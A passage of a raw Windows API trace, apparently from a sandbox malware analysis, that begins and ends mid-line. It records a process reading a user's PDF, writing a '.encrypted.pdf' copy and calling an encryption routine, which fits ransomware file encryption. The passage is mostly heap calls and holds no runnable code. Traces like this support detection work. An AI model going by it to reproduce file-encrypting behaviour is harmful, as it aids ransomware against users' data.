(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\p_vq.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.380] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.380] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.382] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt")) returned 0x10 [0035.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.encrypted.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\p_vq.encrypted.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.385] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.385] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0035.387] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x4528, lpOverlapped=0x0) returned 1 [0035.387] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14528) returned 0x955018 [0035.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14528) returned 0x969548 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14528) returned 0x955018 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.391] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14528) returned 0x955018 [0035.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0035.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14528) returned 0x97da78 [0035.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.393] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.393] CharUpperBuffW (in: 